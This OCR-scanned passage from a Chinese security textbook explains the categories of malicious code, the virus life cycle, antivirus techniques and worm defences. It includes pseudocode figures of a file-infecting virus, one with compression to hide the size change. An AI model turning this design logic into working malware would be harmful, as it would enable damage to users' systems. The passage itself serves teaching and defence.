。 理解 各 种 恶意 代码 的 区 别 。 

。 深入 理解 Windows 7 的 安全 机 制 ,熟练 掌握 各 种 通用 安全 策略 配置 。 
。 理解 Ubuntu Linux 的 安全 机 制 , 掌 握 基 本 的 安全 配置 方法 。 

。 了 解 计算 机 取证 的 基本 原则 和 方法 步骤 。 

熟练 掌握 各 种 计算 机 取证 工具 的 技术 原理 和 使 用 方法 。 


所 谓 恶 意 代 码 ,实质 是 一 种 可 以 独立 执行 的 指令 集 或 嵌入 其 他 程序 的 可 执行 代码 。 
恶意 代码 具有 两 种 比较 重要 的 特性 , 即 独立 性 和 自我 复制 性 。 独 立 性 指 恶意 代码 本 身 可 
以 独立 执行 ; 非 独 立 性 (也 称 依附 性 ) 指 必须 要 骨 入 到 其 他 程序 中 执行 ,恶意 代码 自身 无 
法 独立 执行 。 自 我 复制 性 指 能 够 自动 将 代码 复制 给 其 他 正常 程序 或 其 他 系统 ,不 具有 自 
我 复制 性 的 恶意 代码 必须 借助 其 他 媒介 传播 。 根 据 代码 是 否 拥有 这 两 种 特性 ,恶意 代码 
可 分 为 4 类 。 

(1) 具有 自我 复制 能 力 的 依附 性 恶意 代码 : 主要 代表 是 病毒 。 

(2) 具有 自我 复制 能 力 的 独立 性 恶意 代码 : 主要 代表 是 蠕虫 。 

(3) 不 具有 自我 复制 能 力 的 依附 性 恶意 代码 : 主要 代表 是 后 门 。 

(4) 不 具有 自我 复制 能 力 的 独立 性 恶意 代码 : 主要 代表 是 木马 。 

恶意 代码 防范 指 建立 合适 的 防御 体系 ,及 时 发 现 恶 意 代 码 攻击 ,并 采取 有 效 手 段 阻止 
攻击 ,恢复 受 影响 的 主机 和 系统 。 

操作 系统 的 安全 机 制 在 支持 应 用 程序 的 安全 性 方面 有 着 重要 作用 ,是 保障 系统 安全 
的 基础 。 从 防范 角度 看 ,掌握 安全 机 制 的 原理 可 以 提供 操作 系统 的 整体 安全 性 ; 从 攻击 
角度 看 ,安全 机 制 是 进行 攻击 的 最 大 障碍 ,理解 安全 机 制 的 原理 ,可 以 更 好 地 发 现 其 弱点 
以 实现 攻击 。 本 章 主要 介绍 Windows 7 旗舰 版 和 Ubuntu Linux 操作 系统 的 通用 安全 机 
制 以 及 它们 的 相关 安全 配置 。 

当 系统 遭 到 破坏 或 非法 入 侵 时 ,计算 机 取证 技术 可 以 从 计算 机 中 获取 电子 证 据 并 加 
以 分 析 , 可 以 恢复 被 损坏 的 文件 ,还原 当时 的 系统 状态 ,发 现 攻击 者 的 痕迹 等 ,所 有 分 析 结 
果 都 可 以 作为 事后 追踪 或 司法 起 诉 攻击 者 的 计算 机 证 据 。 
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12.1 恶意 代码 防范 


恶意 代码 的 传播 途径 较 多 : 四 利用 操作 系统 和 应 用 软件 的 漏洞 传播 ,如 2014 年 
OpenSSL 1.0 软件 的 *Heart Bleeding” 漏 洞 ,由 于 OpenSSL 是 许多 大 型 应 用 程序 使 用 的 
基础 软件 包 , 因 此 造成 巨大 损失 ; @ 通 过 网 站 传播 : 攻击 者 可 以 在 网 页 上 挂 载 恶意 代码 ， 
当主 机 浏览 该 网 页 时 ,如 果 主 机 的 防御 软件 无 法 识别 木马 程序 , 则 恶意 代码 会 自动 下 载 到 
主机 执行 ; 攻击 者 可 以 将 恶意 代码 与 正常 应 用 软件 拥 绑 , 当 主机 下 载 正 常 软 件 运行 时 , 恶 
意 代码 也 随 之 自动 执行 ; @ 利 用 移动 媒介 传播 ,如 传染 U 盘 和 硬盘 ,当主 机 访问 这 些 移 
动 媒介 时 ,恶意 代码 可 以 自动 执行 ; @ 利 用 用 户 之 间 的 信任 关系 传播 ,如 冒充 用 户 发 送 虚 
假 链接 、 图 片 、 邮 件 等 , 诱 使 用 户 点 击 , 使 得 恶意 代码 可 以 自动 下 载 执行 。 

恶意 代码 的 编写 语言 多 种 多 样 ,最 常见 的 恶意 脚本 往往 使 用 VBS 或 JavaScript 实 
现 , 木 马 .蠕虫 和 病毒 往往 使 用 C 和 C++ 语言 结合 汇编 代码 实现 ,国内 也 有 不 少 使 用 
Delphi 开发 的 恶意 代码 ,如 “熊猫 烧香 "病毒 。 

虽然 各 种 恶意 代码 的 行为 表现 各 异 ,破坏 程度 千差万别 ,但 是 它们 基本 机 制 大 体 相 
同 ,如 图 1-7 所 示 ,主要 分 为 以 下 5 个 步 又 。 

(1) 入 侵 系统 : 恶意 代码 实现 目的 的 前 提 条 件 ,可 以 是 远程 攻击 、 网 页 木马 .邮件 病 
毒 、 网 络 钓鱼 。 

(2) 维持 或 提升 权限 : 恶意 代码 的 传播 与 破坏 必须 使 用 用 户 或 进程 的 合法 权限 才能 
(3) 隐蔽 : 为 了 躲避 安全 软件 检测 ,可 以 通过 改名 、 删 除 文件 或 修改 系统 安全 策略 隐 
藏 自己 。 

(4) 潜伏 : 平时 不 运行 ,等 待 触发 条 件 满足 时 才 发 作 并 进行 破坏 。 

(5) 破坏 : 恶意 代码 的 本 质 具有 破坏 性 ,包括 信息 窃取 、 破 坏 系 统 完 整 性 等 。 

通用 的 恶意 代码 防范 技术 主要 包括 以 下 4 种 。 

(1) 基于 特征 的 扫描 技术 : 首先 建立 各 种 恶意 代码 的 特征 文件 ,在 扫描 时 根据 特征 
进行 匹配 查找 ,这 是 安全 软件 最 常用 的 技术 。 

(2) 校 验 和 法 : 在 系统 部 署 之 前 对 需要 监控 的 正常 文件 生成 校 验 和 ,然后 周期 性 地 
生成 文件 的 校 验 和 并 与 原始 校 验 和 进行 比较 ,判断 文件 是 否 改变 ,这 是 完整 性 检测 工具 如 
AIDE 和 Tripwire 使 用 的 方法 。 

(3) 沙 箱 技术 : 根据 程序 需要 的 资源 和 拥有 的 权限 建立 程序 的 运行 沙 箱 ,使 得 每 个 
程序 运行 在 隔离 沙 箱 中 ,无 法 影响 其 他 进程 ,所 以 可 以 安全 检测 和 分 析 恶 意 代码 的 行为 。 

(4) 基于 蜜 钠 的 检测 技术 : 蜜 钠 是 虚拟 系统 ,伪装 成 有 许多 服务 正在 运行 的 主机 以 
吸引 攻击 者 ,同时 安装 强大 的 监测 系统 用 于 监测 恶意 代码 的 攻击 过 程 , 采 用 黑 盒 分 析 方 
法 ,制定 防范 该 恶意 代码 的 策略 。 

除了 通用 技术 以 外 ,还 需要 针对 不 同类 别 的 恶意 代码 的 特点 ,使 用 针对 性 方法 和 策略 
以 有 效 防 御 恶 意 代 码 的 攻击 。 本 节 详 细 介绍 病毒 .蠕虫 .木马 等 各 类 代表 性 恶意 代码 的 特 
点 和 防范 方法 。 
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12.1.1 病毒 及 其 防范 方法 


计算 机 病毒 指 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 、 影 响 计 算 机 并 
能 够 自我 复制 的 一 组 指令 或 程序 代码 。 它 是 能 够 通过 修改 而 “传染 "其 他 程序 的 一 段 代 
码 , 这 种 修改 包括 在 原 程序 中 注入 能 够 复制 病毒 程序 的 代码 ,而 这 种 病毒 程序 又 能 够 传染 
其 他 程序 。 病 毒 可 以 做 任何 其 他 程序 可 以 做 的 事情 ,与 正常 程序 唯一 的 不 同 之 处 在 于 它 
将 自身 附加 在 其 他 宿主 程序 上 ,在 宿主 程序 执行 的 同时 秘密 执行 其 他 功能 。 

典型 病毒 的 生命 周期 包括 4 个 阶段 : 

(1) 睡眠 : 在 这 个 阶段 ,病毒 不 执行 操作 ,等 待 某 种 触发 条 件 , 如 某 个 日 期 或 某 个 程 
序 的 执行 等 ,但 是 并 非 所 有 的 病毒 都 有 这 个 阶段 。 

(2) 传染 : 病毒 将 其 自身 或 变种 附加 到 其 他 程序 或 复制 到 硬盘 的 某 些 系统 区 域 , 每 
个 被 传染 的 程序 都 会 包含 病毒 的 一 个 变种 副本 ,这些 副本 会 继续 传染 其 他 程序 。 

(3) 触发 : 当 某 种 触发 条 件 被 满足 时 ,病毒 将 被 激活 以 执行 预 设 功能 。 

(4) 执行 : 病毒 执行 预 设 功能 ,达到 预期 目标 ,有 的 功能 可 能 只 是 恶作剧 性 质 , 有 的 
可 能 会 造成 巨大 破坏 ,如 2017 年 爆发 的 “勒索 "病毒 对 Word 文件 进行 加 密 , 使 文件 无 法 

绝 大 部 分 病毒 都 只 是 针对 特定 的 操作 系统 和 CPU 架构 以 特定 方式 执行 ,因此 病毒 
的 编制 者 往往 对 底层 系统 的 细节 和 特点 有 深入 地 理解 。 病 毒 程序 通常 包含 三 部 分 : 四 传 
染 机 制 ; @ 和 触发 条 件 ; @ 破 坏 功能 。 图 12-1 给 出 一 个 简单 的 病毒 示例 ,以 伪 码 方式 表示 
病毒 的 执行 逮 辑 。 





Start Virus: 
goto main; // 程 序 入 口 指令 为 跳 转 指令 ,直接 跳 至 病毒 代码 位 置 
Infect label: 
OxFFEEDDCC; // 设 置 传染 标记 , 避免 重复 传染 
infect() { 
loop: 


file = 随机 获取 宿主 文件 路 径 ; 
if 程序 已 经 被 传染 // 判 断 infect_label 位 置 的 传染 标记 是 否 已 经 设置 
goto loop; 
把 Start_Virus 到 End_Virus 的 指令 复制 至 file 的 前 面 位 置 ; 
} 
damage( ) { 执行 各 种 破坏 功能 ; } 
trigger() {如 果菜 种 条 件 满足 , 则 返回 true; 否则 返回 false; } 
main: 
infect( ); 
if (true == trigger()) damage(); 
goto End Virus; 
End_Virus: 
一 // 正 常 代码 


图 12-1 病毒 代码 示例 
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当 程序 被 调用 时 ,首先 跳 转 至 病毒 代码 位 置 执行 ,病毒 程序 随机 寻找 未 被 传染 的 可 执 
行文 件 并 对 它们 进行 传染 操作 (infect) ,如 果 触 发 条 件 trigger() 返 回 真 值 ,就 立刻 执行 破 
坏 功能 damage() ,最 后 病毒 将 控制 权 交 给 宿主 程序 “goto End_Virus”。 如 果 整 个 传染 和 
破坏 过 程 足 够 快 ,用 户 通 常 很 难 识别 程序 被 传染 前 后 的 区 别 。 

由 于 传染 后 的 程序 通常 会 比 被 传染 前 的 程序 长 ,图 12-1 的 方法 生成 的 病毒 很 容易 被 
检测 到 。 攻 击 者 采取 的 对 策 是 对 传染 后 的 程序 进行 压缩 ,使 得 无 论 程序 是 否 被 传染 ,长 度 
都 不 变 ,图 12-2 给 出 了 这 种 方法 的 操作 逻辑 。 

(1) 对 每 个 未 被 传染 的 文件 P, 首 先 压缩 该 文件 生成 比 原始 文件 小 的 P', 并 且 P 与 P' 
的 文件 大 小 差异 刚好 是 病毒 代码 的 大 小 。 

(2) 病毒 将 自身 代码 复制 至 压缩 文件 的 前 面 。 

(3) 将 自身 所 附加 的 宿主 程序 解压 缩 。 

(4) 执行 解压 后 的 原宿 主 程序 。 

病毒 按 目标 分 类 可 以 分 为 引导 区 病毒 ,文件 传染 病毒 和 宏 病毒 。 引 导 区 病毒 传染 主 
引导 记录 或 者 其 他 引导 记录 , 当 系统 从 包含 这 种 病毒 的 硬盘 启动 时 ,病毒 会 立即 执行 , 现 
在 一 般 常 见于 U 盘 和 移动 硬盘 。 文 件 传染 病毒 即 采用 类 似 于 图 12-1 和 图 12-2 的 方法 ， 
用 于 传染 各 种 可 执行 文件 。 宏 病毒 通常 传染 Office 文件 和 PDF 文件 等 ,在 解释 宏 代码 时 
启动 传染 和 破坏 功能 。 病 毒 按 隐蔽 策略 分 类 可 分 为 加 密 病毒 .多 态 病毒 和 变形 病毒 ,具体 
请 参见 5. 3. 1 节 。 


Start_Virus : 
goto main; // 程 序 和 人口 指令 为 跳 转 指令 ,直接 跳 至 病毒 代码 位 置 
Infect_label : 
0xFFEEDDCC; // 设 置 传染 标记 , 避免 重复 传染 
infect() { 
loop: 
file = 随机 获取 宿主 文件 路 径 ; 
if 程序 已 经 被 传染 // 判 断 infect_label 位 置 的 传染 标记 是 否 已 经 设置 
goto loop; 
压缩 file; 
把 Start_Virus 到 End_Virus 的 指令 复制 至 压缩 后 的 file 的 前 面 位 置 ; 
} 
damage( ) { 执行 各 种 破坏 功能 ; } 
trigger() { 如 果 某 种 条 件 满足 , 则 返回 true; 否则 返回 false; } 
main: 
infect(); 
证 (true == trigger()) damage(); 
解压 End_Virus 后 的 数据 ; 
执行 压缩 后 的 原宿 主 程序 ; 
End Virus: 
ee // 压 缩 后 的 正常 代码 


图 12-2 ”病毒 压缩 逻辑 
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理想 的 解决 病毒 威胁 的 方法 是 预防 , 即 不 允许 病毒 进入 系统 ,或 者 阻止 病毒 传染 文件 
这 个 目标 通常 无 法 实现 。 实 际 的 反 病 毒 方法 由 检测 ,识别 和 清除 三 步骤 组 成 : 检测 指 在 
病毒 传染 文件 或 系统 时 ,必须 及 时 发 现 并 定位 病毒 ; 识别 指 检 测 病毒 后 ,应 该 识别 出 病毒 
的 具体 类 型 ; 清除 指 对 被 传染 的 程序 进行 恢复 ,清除 病毒 使 程序 还 原 到 传染 前 的 状态 ,并 
清除 所 有 系统 中 存在 的 病毒 变种 ,使 其 无 法 继续 传播 ,如 果 无 法 清除 , 蔡 代 的 方案 是 删除 
被 传染 程序 并 且 用 一 份 干净 的 备份 版 本 代替 。 

随 着 病毒 技术 的 不 断 发 展 , 反 病毒 技术 也 经 历 了 4 代 。 

(1) 以 病毒 特征 码 作为 识别 病毒 的 主要 依据 。 病 毒 可 能 包含 一 些 通配符 ,存在 于 该 
病毒 的 所 有 副本 中 ,可 以 用 来 检测 该 类 型 的 病毒 。 另 一 种 特征 是 程序 的 长 度 ,通过 对 程序 
长 度 的 变化 监测 进行 病毒 检测 。 

(2) 利用 启发 式 规则 搜索 可 能 的 病毒 传染 。 寻 找 与 病毒 相关 联 的 代码 碎片 确定 病 
毒 , 例 如 可 能 会 搜寻 多 态 病毒 使 用 的 加 密 循环 部 分 并 且 定 位 加 密 密 钥 ,从 而 将 病毒 解密 并 
确认 类 型 ,然后 清除 病毒 。 另 一 种 方法 是 完整 性 校 验 ,采用 加 密 散 列 函数 的 方法 计算 每 个 
程序 的 校 验 和 ,并 且 单 独 保存 散 列 密 钥 , 这 样 病毒 传染 程序 时 无 法 同步 生成 有 效 的 散 
列 码 。 

(3) 内 存 驻 留 型 程序 。 通 过 病毒 传染 程序 的 行为 而 不 是 病毒 代码 的 结构 进行 识别 ， 
不 需要 病毒 特征 码 和 启发 式 规则 ,只 须 确定 行为 中 具有 部 分 传染 特征 即 可 开始 干预 。 

(4) 综合 运行 多 种 反 病毒 技术 ,如 扫描 、 活 动 陷阱 ,访问 控制 等 。 

如 今 , 高 级 的 反 病 毒 技术 和 产品 不 断 涌现 ,其 中 有 三 种 最 重要 的 反 病 毒 技术 值得 重点 
描述 , 即 通 用 解密 、 数 字 免 疫 系 统 和 行为 阻 断 。 

1. 通用 解密 

通用 解密 技术 使 得 反 病 毒 软件 在 保持 扫描 速度 的 同时 可 以 轻松 检测 最 为 复杂 的 病毒 
变种 ,因为 当 多 态 病 毒 执行 时 ,病毒 会 首先 将 自身 解密 。 它 主要 包括 CPU 模拟 器 、 特 征 
码 扫 描 器 和 仿真 控制 等 组 件 。 

CPU 模拟 器 是 基于 软件 的 虚拟 机 ,可 以 模拟 执行 可 执行 文件 中 的 机 器 指令 。 模 拟 器 
包括 所 有 寄存 器 和 其 他 硬件 的 软件 模拟 ,在 模拟 器 上 执行 程序 对 真实 系统 不 会 产生 任何 
和 危害。 特征 码 扫 描 器 用 于 解密 病毒 后 ,扫描 病毒 代码 以 寻找 已 知 特征 码 的 模块 。 仿 真 控 
制 用 于 控制 病毒 代码 的 模拟 执行 。 

模拟 执行 时 ,模拟 器 每 次 执行 一 条 指令 , 当 指 令 包含 用 于 解密 和 释放 病毒 的 过 程 , 模 
拟 器 即 可 模拟 实现 解密 和 释放 病毒 。 控 制 模块 周期 性 地 中 断 模拟 执行 并 且 扫 描 病 毒 代码 
中 是 否 包含 特征 码 。 在 模拟 执行 时 ,由 于 病毒 代码 在 一 个 完全 受 控 的 模拟 环境 中 , 它 无 法 
对 当前 系统 造成 任何 危害 。 

通用 解密 技术 的 最 大 难点 在 于 确定 每 次 模拟 执行 的 时 间 。 典 型 的 病毒 代码 会 在 程序 
开始 执行 后 马上 运行 解密 过 程 ,但 是 并 不 是 所 有 病毒 都 如 此 。 模 拟 时 间 越 长 ,病毒 越 有 可 
能 被 识别 ,但 是 , 反 病毒 扫描 的 时 间 随 之 变 长 ,因为 反 病毒 软件 的 时 间 和 资源 都 十 分 有 限 。 

2. 数字 免疫 系统 

数字 免疫 系统 以 CPU 模拟 为 基础 ,对 其 进行 扩展 并 实现 了 更 为 通用 的 模拟 器 和 病 
毒 检测 系统 。 它 的 设计 目标 是 当 病毒 刚刚 进入 系统 就 会 立即 得 到 有 效 控制 ,免疫 系统 会 
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自动 对 其 进行 捕获 分析、 检测 、 屏 项 和 清除 ,并 能 够 报告 该 病毒 信息 ,从 而 使 得 这 种 病毒 
在 广泛 传播 之 前 即 可 被 检测 。 图 12-3 给 出 了 数字 免疫 系统 操作 的 典型 步骤 。 
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图 12-3 数字 免疫 系统 


(1) 每 台 主 机 运行 监控 程序 ,包含 多 种 启发 式 规 则 ,根据 系统 行为 .程序 的 可 疑 变化 
和 特征 码 等 推断 是 否 是 病毒 代码 ,并 将 可 疑 病毒 代码 发 送 到 管理 主机 。 

(2) 管理 主机 对 收 到 的 病毒 进行 加 密 并 发 送 给 中 央 病 毒 分 析 主 机 。 

(3) 病毒 分 析 主 机 创造 一 个 可 以 安全 运行 病毒 代码 并 进行 分 析 的 环境 ,包括 CPU 模 
拟 器 或 者 可 以 监控 执行 病毒 代码 的 受 控 环境 ,然后 根据 分 析 结 果 产 生 识别 和 清除 病毒 的 
策略 和 方法 ,提取 新 的 病毒 特征 码 , 更 新 病毒 库 。 

(4) 病毒 分 析 主机 将 病毒 代码 的 清除 方法 传 给 管理 主机 。 

(5) 管理 主机 将 清除 方法 转发 给 相应 主机 以 及 其 他 所 有 主机 。 

(6) 网 络 中 的 所 有 用 户 会 定期 收 到 病毒 库 的 更 新 文件 ,从 而 避免 受到 新 的 病毒 威胁 。 

数字 免疫 系统 主要 依赖 于 病毒 分 析 主 机 检测 新 病毒 的 能 力 。 

3. 行为 阻 断 

与 启发 式 或 基于 特征 码 的 反 病 毒 技术 不 同 ,行为 阻 断 与 操作 系统 相 结合 ,实时 监控 恶 
意 的 程序 行为 ,也 称 为 主动 防御 技术 。 在 检测 到 恶意 行为 后 ,可 以 在 它 对 系统 实施 攻击 之 
前 将 其 阻止 。 可 阻 断 的 行为 主要 包括 : 

(1) 试图 打开 、 查 看 、 删 除 、 添 加 或 修改 文件 ; 

(2) 试图 格式 化 硬盘 或 其 他 不 可 恢复 的 磁盘 操作 ; 

(3) 修改 可 执行 文件 或 者 宏 的 执行 逻辑 ; 

(4) 修改 关键 系统 配置 ,如 注册 表 ; 

(5) 初始 化 网 络 连接 ; 

(6) 使 用 脚本 发 送 可 执行 程序 。 

图 12-4 说 明了 行为 阻 断 方法 , 它 运行 在 服务 器 或 主机 上 ,执行 管理 员 设 置 的 安全 策 
略 。 它 允许 正常 的 访问 行为 ,但 是 在 出 现 可 疑 行为 时 会 进行 判定 和 决策 ; 如 果 判 定 为 恶 
意 行 为 , 它 将 把 恶意 代码 隔离 在 限制 访问 系统 资源 的 沙 箱 内 ,然后 发 出 报警 。 
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3. 行为 阻 断 软件 标 出 可 疑 
代码 ， 沙 箱 过 滤 该 可 疑 代 
码 并 阻止 其 执行 


通过 防火 墙 






1. 管理 员 设置 合法 的 行为 
策略 并 上 传 到 服务 器 和 主机 





4. 服务 器 发 出 报警 ,可疑 = 
代码 已 经 被 识别 和 过 滤 ， ”执行 行为 阻 
等 待 管理 员 决定 是 否 清除 。 ”的 服务 器 
或 允许 执行 


图 12-4 行为 阻 断 方法 


尽管 病毒 进行 多 态 变化 以 躲避 启发 式 或 特征 码 扫描 器 的 检测 ,但 是 病毒 最 终 将 向 操 
作 系 统 提出 定义 明确 的 操作 请 求 ,而 行为 阻 断 可 以 实时 截获 这 些 请 求 , 并 识别 和 阻 断 它们 
的 执行 ,不 需要 考虑 它们 是 否 经 过 精巧 的 变化 。 行 为 阻 断 的 能 力也 是 有 限 的 ,因为 在 识别 
某 种 可 疑 行为 之 前 ,病毒 已 经 运行 在 主机 上 ,很 可 能 已 经 造成 了 巨大 危害 。 另 外 ,即使 病 
毒 行为 被 有 效 阻止 ,病毒 代码 的 具体 位 置 可 能 仍然 无 法 准确 定位 。 因 此 ,现代 反 病毒 软件 
通常 将 行为 阻 断 技术 与 传统 的 特征 码 和 启发 式 方法 结合 使 用 ,以 有 效 提高 扫描 病毒 的 
能 力 。 


12.1.2 蠕虫 及 其 防范 方法 


蠕虫 是 一 种 可 以 自行 复制 ,并 通过 网 络 连接 将 自身 或 变种 发 送 到 其 他 主机 的 程序 , 当 
进入 某 台 主机 后 , 它 会 被 再 次 激活 并 开始 新 的 传染 。 蠕 虫 会 主动 在 网 络 中 寻找 目标 主机 
进行 传染 ,而 每 台 被 传染 的 主机 又 变 成 了 对 其 他 主机 实施 攻击 的 源头 。 除 了 传染 以 外 ,里 
虫 也 经 常 执行 破坏 功能 ,例如 著名 的 蠕虫 “Red Code IT? 就 是 以 IIS 服务 器 为 目标 ,其 中 包 
含 后 门 功能 ,使 攻击 者 可 以 在 远程 主机 上 执行 任意 指令 。 

蠕虫 与 病毒 具有 相同 的 特征 ,具有 睡眠 、 传 染 、 触 发 和 执行 阶段 , 它 在 传染 阶段 通常 随 
机 扫描 网 段 内 的 IP 地 址 或 者 搜索 邮箱 的 地 址 惫 以 选 定 下 一 步 要 传染 的 目标 ,然后 与 远程 
系统 建立 连接 并 将 自身 复制 到 远程 系统 执行 。 

蠕虫 的 传播 通常 分 为 三 个 阶段 , 即 慢 开始 、 快 速 传播 和 慢 结 束 。 在 慢 开始 阶段 ,被 传 
染 的 主机 呈 指 数 增 长 ,蠕虫 从 一 台 主 机 开始 传染 附近 的 两 台 主机 ,然后 这 两 台 主 机 再 传染 
四 台 主 机 , 依 此 类 推 。 在 一 段 时 间 后 进入 快速 传播 阶段 ,此 时 许多 主机 已 经 被 传染 ,而 攻 
击 被 传染 的 主机 会 大 量 耗费 时 间 , 因 此 传染 率 下 降 , 但 是 被 传染 的 主机 还 是 呈 线 性 增长 。 
当 绝 大 部 分 有 漏洞 的 主机 都 被 传染 以 后 ,蠕虫 难以 寻找 新 的 目标 主机 ,使 得 攻击 进入 慢 结 
东 阶 段 。 显 然 , 防 范 蠕 虫 的 目标 就 是 在 慢 开始 阶段 , 当 较 少 主机 被 传染 时 控制 蠕虫 的 
传播 。 

现代 蠕虫 的 技术 特点 包含 以 下 方面 。 

(1) 跨 平台 : 不 限于 Windows 系统 ,可 以 攻击 各 种 平台 ,如 Linux 和 UNIX。 

(2) 攻击 方式 多 样 : 以 多 种 方式 人 侵 系 统 , 如 攻击 服务 器 、 浏 览 器 .电子 邮件 或 其 他 
流行 的 应 用 程序 。 

(3) 多 态 和 变形 : 使 用 恶意 代码 的 多 态 和 变形 技术 生成 自身 的 变种 ,躲避 安全 软件 
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(4) 作为 传输 工具 : 蠕虫 是 传播 DDoS 攻击 的 理想 工具 ,因为 它 可 以 迅速 传染 大 量 系 
统 ,很 容易 构建 僵尸 网 络 。 

(5) 零 日 攻击 : 蠕虫 往往 利用 还 未 公开 的 漏洞 发 起 攻击 ,可 以 达到 短 时 间 内 传染 大 
量 主机 的 目标 。 

防范 蠕虫 的 技术 很 多 , 当 蠕 虫 人 侵 系统 后 ,可 以 用 反 病 毒 软件 进行 检测 和 识别 ; 另 
外 ,还 可 以 监测 蠕虫 的 传播 行为 以 构建 基本 对 策 。 一 个 有 效 的 蠕虫 防范 方法 需要 满足 如 
下 基本 的 条 件 。 

(1) 通用 性 : 可 以 处 理 多 种 类 型 的 蠕虫 攻击 ,包括 多 态 和 变形 的 变种 。 

(2) 实时 性 : 需要 对 蠕虫 传染 作出 迅速 反应 ,限制 受害 主机 的 数量 。 

(3) 灵活 性 : 能 够 应 对 蠕虫 所 采取 的 各 种 躲避 方法 ,有 效 检测 蠕虫 。 

(4) 代价 最 小 : 尽 可 能 地 减少 因为 防范 蠕虫 而 对 系统 性 能 或 系统 功能 造成 影响 。 

(5) 透明 性 : 防范 方法 不 能 对 操作 系统 、 应 用 软件 和 硬件 做 修改 。 

(6) 高 覆盖 性 : 能 够 处 理 来 自 内 网 和 外 网 的 攻击 。 

但 是 ,很 省 有 对 策 能 同时 满足 上 述 所 有 条 件 , 因 此 安全 人 员 必 须 选 择 多 种 方法 防范 蠕 
虫 攻击 。 常 用 的 防范 方法 如 下 。 

(1) 基于 签名 的 检测 : 根据 可 疑 的 蠕虫 传染 的 网 络 数据 流 生成 蠕虫 的 特征 码 , 并 将 
特征 码 发 给 网 络 中 的 其 他 主机 , 当 蠕 虫 开始 新 的 传染 时 ,网 络 中 的 主机 会 立即 检测 到 。 此 
方法 容易 受到 多 态 和 变形 技术 的 攻击 ,产生 的 特征 码 很 可 能 对 新 的 变种 无 效 。 

(2) 基于 过 滤器 的 检测 : 检测 蠕虫 的 内 容 而 不 是 特征 码 , 扫 描 每 个 网 络 报 文 检测 是 
否 含有 蠕虫 代码 。 此 方法 依赖 各 主机 的 相互 协作 ,需要 高 效 的 检测 算法 。 

(3) 基于 Payload 分 类 的 检测 : 使 用 异常 检测 技术 对 网 络 报 文 进行 检测 ,存在 一 定 的 
误 报 率 和 漏 报 率 , 它 通常 搜索 蠕虫 代码 的 语义 特征 ,如 数据 流 和 控制 流 结构 。 

(4) 基于 阅 值 的 随机 扫描 检测 : 随机 选取 目标 主机 进行 连接 并 检测 ,适合 在 高 速 低 
功 耗 的 网 络 设备 中 部 署 ,能 够 有 效 地 检测 常见 的 蠕虫 行为 。 

(5) 基于 速率 限制 的 检测 : 检测 主机 的 某 种 网 络 行为 的 速率 是 否 正 常 , 如 限制 某 段 
时 间 内 主机 可 以 连接 的 目标 主机 数量 ,限制 可 以 扫描 的 IP 地 址 数目 。 当 发 现 主机 短 时 间 
内 试图 连接 大 量 主 机 时 ,可 能 就 是 蠕虫 在 进行 传染 。 这 种 方法 无 法 检测 低速 隐蔽 的 蠕虫 。 

(6) 基于 速率 的 中 断 机 制 : 一 旦 主机 的 输出 报 文 速率 超出 阔 值 ,将 立即 阻塞 输出 报 
文 , 它 应 该 具备 透明 性 。 中 断 机 制 可 以 与 基于 签名 和 过 滤器 的 方法 同时 使 用 。 当 生成 了 
签名 或 者 过 滤器 后 , 即 可 将 之 前 阻塞 的 主机 解除 阻塞 。 它 也 不 适用 于 低速 隐蔽 的 蠕虫 。 

图 12-5 和 图 12-6 给 出 了 两 种 实际 的 蠕虫 防范 方法 的 部 署 图 ,分 别 是 蠕虫 提前 封 堵 
方法 (PWC) 和 基于 网 络 协作 的 防范 方法 。 

PWC 方法 使 用 基于 主机 的 方式 在 慢 开始 阶段 对 蠕虫 进行 定位 ,每 台 主 机 负责 检测 单 
位 时 间 内 自身 对 外 发 起 连接 的 数量 。 当 数量 超出 阅 值 时 ,主机 会 立即 阻塞 进一步 的 连接 
尝试 。 一 个 PWC 系统 由 PWC 管理 器 和 主机 上 的 PWC 代理 组 成 。 图 12-5 中 ,安全 管理 
器 ,签名 抽取 器 和 PWC 管理 器 被 集成 进 一 个 单独 的 设备 ,实际 上 它们 也 可 以 分 开 部 署 。 
PWC 的 操作 过 程 如 下 : 
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3. 发 送 分 析 结果 
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4. 测试 蠕虫 




















图 12-6 ”基于 网 络 协作 的 蠕虫 防范 


(1) PWC 代理 监测 主机 的 对 外 连接 数量 , 当 对 外 面 某 个 UDP 或 TCP 端口 的 连接 超 
出 闵 值 时 ,代理 执行 以 下 操作 : 向 主机 发 出 报警 ; @ 阻 止 所 有 与 目标 端口 相同 的 对 外 
连接 尝试 ; @ 向 PWC 管理 器 发 送 报警 ; @ 开 始 阔 值 分 析 。 

(2) PWC 管理 器 接收 报警 ,将 报警 传播 到 网 络 中 的 其 他 所 有 PWC 代理 。 

(3) 主机 接收 报警 ,PWC 代理 决定 是 否 忽略 该 报警 。 如 果 PWC 已 经 检测 出 蠕虫 则 
忽略 该 报警 ,否则 PWC 假定 受到 传染 并 且 阻 止 所 有 的 外 出 连接 尝试 ,并 开始 阔 值 分 析 。 

(4) 国 值 分 析 。PWC 在 固定 时 间 段 内 监测 对 外 连接 数量 ,判定 对 外 连接 数量 是 否 超 
出 阅 值 ,如 果 是 则 继续 阻止 该 目标 端口 的 对 外 连接 尝试 ,并 对 下 一 个 时 间 有 段 执行 阅 值 分 
析 , 直 到 对 外 发 起 连接 的 数量 低 于 阅 值 为 止 ,此 时 PWC 代理 会 解除 阻止 。 如 果 经 过 较 长 
时 间 , 对 外 连接 的 数量 仍然 超出 阅 值 ,PWC 代理 将 隔离 该 主机 并 向 PWC 管理 器 报告 。 

PWC 的 另外 两 个 组 件 是 安全 管理 器 和 签名 抽取 器 。 签 名 抽取 器 被 动 检 测 所 有 的 报 
文 , 试 图 从 蠕虫 发 送 的 报 文 信息 中 抽取 出 可 用 的 签名 , 当 新 的 蠕虫 签名 产生 后 ,将 该 签名 
通过 安全 管理 器 传递 给 防火 墙 以 过 滤 该 蜂 虫 。 同 时 .PWC 管理 器 可 以 将 蠕虫 签名 发 送 至 
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PWC 代理 ,使 得 代理 可 以 立即 发 现 传染 报 文 从 而 检测 出 蠕虫 。 

基于 网 络 协作 的 蠕虫 防范 的 关键 在 于 监测 软件 ,分 别 监测 进入 内 网 的 报 文 或 者 监测 
发 往外 网 的 报 文 。 监 测 软件 可 以 部 署 在 内 网 和 外 网 的 交接 处 , 既 可 以 是 边界 路 由 器 或 防 
火 墙 的 一 部 分 ,也 可 以 是 独立 的 监测 设备 。 监 测 器 可 以 采用 类 似 IPS 的 方式 运行 ,向 管理 
